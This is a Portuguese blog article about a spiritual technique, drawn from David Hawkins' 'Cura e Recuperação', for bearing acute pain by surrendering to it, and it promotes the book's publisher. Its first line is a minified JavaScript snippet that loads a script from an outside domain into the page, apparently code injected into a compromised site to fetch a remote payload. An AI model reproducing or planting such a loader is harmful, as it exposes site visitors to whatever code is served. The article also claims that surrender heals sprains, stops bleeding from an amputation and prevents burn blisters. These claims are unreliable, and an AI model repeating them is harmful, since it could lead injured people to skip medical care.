;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); Como lidar com a dor aguda sem sofrimento? - David Hawkins Brasil
Categorias
Níveis de Consciência

Como lidar com a dor aguda sem sofrimento?

Não, a dor e o sofrimento não são a mesma coisa, por mais surpreendente que essa informação possa parecer. Não é necessário ser vítima da dor e isso é possível justamente descontruindo a crença de que dor é igual a sofrimento. É possível que a dor esteja presente, mas não seja sentida devido ao estado de consciência. Isso é o que acontece de forma artificial quando tomamos uma anestesia, mas aqui vamos ensinar como chegar nesse estado de forma natural.

Acreditamos que a dor é sentida fisicamente, mas na verdade ela é interpretada pela mente. Enquanto a mente, só sabe o que se passa nela devido a consciência. No artigo sobre Sexualidade aprofundamos um pouco mais sobre como isso funciona.

“O conteúdo da mente e o que está se passando nela é observado através da consciência; assim sendo, toda experiência está ocorrendo na consciência.” – Dr. David Hawkins, “Cura e Recuperação”

Lidando com a dor aguda

O ego acredita que ao resistir a dor, ela será eliminada. Queremos resistir a todo custo por acreditar que a dor gera sofrimento. Ficamos chocados que houve um acidente e mentalizando sobre isso, querendo que não tivesse acontecido. A técnica que vamos usar é o oposto disso é desapegar da resistência, e vamos mostrar porque isso é muito melhor do que toda a resistência que geramos normalmente.

“Desapegar da resistência significa estar por completo no evento e se render totalmente a sensação. Significa ignorar os pensamentos que possamos estar tendo sobre o evento. Em vez de pensar sobre isso, vamos entrar diretamente na experiência da sensação e desapegar de resisti-la. Por exemplo, se nos queimarmos acidentalmente e desapegarmos de resistir a sensação, inicialmente será como uma saturação. Abrimos as portas, a dor se intensifica, e nos rendemos totalmente a ela e desapegamos de resistir.

A maneira de fazer isso é dizer “Mais, mais, mais”. A maneira de manter isso em mente para que seja aceitável é saber que existe uma quantidade limitada de dor em cada experiência. Abrimos a porta e a deixamos se esgotar rapidamente. “Desapego de resistir a essa experiência. Desapego de resistir em estar com ela. Ignoro os pensamentos, pois os pensamentos não serão úteis. Ao invés disso, me rendo totalmente e me permito experienciar a experiência na sua totalidade”. É como se a porta se abrisse, a intensidade aumenta e a dor é totalmente experienciada e esgotada em poucos minutos.” – Dr. David Hawkins, “Cura e Recuperação”

Experiências de quem aplicou a técnica para dores agudas

Quando escolhemos sentir a experiência da dor, deixamos de ser vítimas da experiência e nos tornamos senhores dela. A técnica foi utilizada pelo próprio dr. David Hawkins ao torcer o tornezelo e o pé esquerdo, em seguida dessas experiências, ele sentiu ondas de dor aguda, mas não precisou enfaixar e ficou completamente curado. 

Quando ele cortou seu dedão fora com uma serra ao fazer carpintaria o sangue parou de jorrar em poucos segundos após amputar seu dedo. Ficaram apenas 8 gostas na tábua de madeira que está guardada até hoje.

No entanto, ele não foi o único a experienciar os benefícios dessa técnica. Foram muitos os casos, mas ele cita mais dois alunos dele que fizeram isso com queimaduras intensas e não tiverem as bolhas que se esperaria delas. Além disso, conta o caso de uma turma em que ensinou sobre isso numa semana, e na próxima semana vários alunos tiverem acidentes e puderam comprovar a eficácia da técnica.

Você não precisa acreditar no que está aqui, a técnica pode ser experienciada por qualquer pessoa. Tudo o que precisa ser feito é desapegar da resistência. Enquanto a resistência estiver presente, a experiência permanece. Portanto, é a resistência que nos coloca na posição de vítimas e é assim a dor ganha poder sobre nós. 

Correlação da Experiência com os níveis de Consciência

Quando tentamos controlar a experiência ou usar força de vontade, estamos em um nível de consciência negativo de Raiva e Indignação (150), inconformados porque ter que sentir dor. Aqui, ficamos presos num mar de emoções negativas, sem alívio dos sintomas. 

No entanto, podemos criar Coragem (200) de agir diferente e compreender a Neutralidade (250) de que “está tudo bem passar por isso”. Assim, surge a Disposição (310) de lidar com isso até o final. Com essa escolha ficamos dispostos a aceitar o que é e nós nos elevamos a Aceitação (380).

Ao escolher aplicar a técnica que ensinamos aqui a pessoa observa que seu ego não precisa lidar com a dor, em vez disso, Algo Maior, o Amor (500) está com elas nesse momento. Até que isso nos eleva ao Amor Incondicional (540) que é o nível da Cura e do desapego à resistência. 

“É fazendo essas coisas que elas se tornam reais. Fazendo esse exercício co- meçamos a experienciar que algo além do eu pessoal está lidando com a experiência e, dentro de instantes, o que era agonizante se torna suportável. Saímos da resistência e do medo do sofrimento.”  – Dr. David Hawkins, “Cura e Recuperação”

Não perca nada!

Essa é a primeira parte do artigo inspirado no “Capítulo 10: Dor e Sofrimento” do livro “Cura e Recuperação”. Na segunda parte, que vamos publicar semana que vem, ensinaremos a lidar com a dor crônica.

Leia direto da fonte: livro “Cura e Recuperação” 

Uma das melhores maneiras de absorver toda a profundidade do trabalho do Dr. David Hawkins é por meio de seus livros. Neles, você conseguirá se aprofundar no contexto e com isso poderá aplicar os ensinamentos de forma prática na sua vida.

Além disso, os leitores de Hawkins que se dedicam a viver suas lições têm benefícios claros em todas as áreas, como nos relacionamentos, espiritualidade, saúde, autoestima, finanças e vida profissional.

No livro “Cura e Recuperação” ele nos ensina a assumir a responsabilidade pela nossa própria cura e abordar as doenças no âmbito de corpo, mente e espírito, de maneira a praticar a espiritualidade em serviço a Deus mesmo nos momentos mais difíceis da nossa vida. Mas não é só isso, ao descobrir a Verdade, vamos aprender a lidar com a sexualidade, o envelhecimento, questões de emagrecimento e até a própria morte.

Acima de tudo, trazemos, em nós, a intenção de aliviar o sofrimento humano em todas as suas formas e expressões. Essa é uma intenção do dr. David Hawkins com todas as suas obras e que Pandora Treinamentos absorveu, pela sua inspiração e pelo compromisso em traduzir seus livros para português. Visto que a Editora Pandora é a responsável pelas traduções autorizadas das obras do professor, incluindo o livro “Cura e Recuperação” no Brasil.

Estão todos convidados para mergulhar nesse conteúdo conosco.

Acesse o site da Editora Pandora e adquira o seu exemplar do livro Cura e Recuperação.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *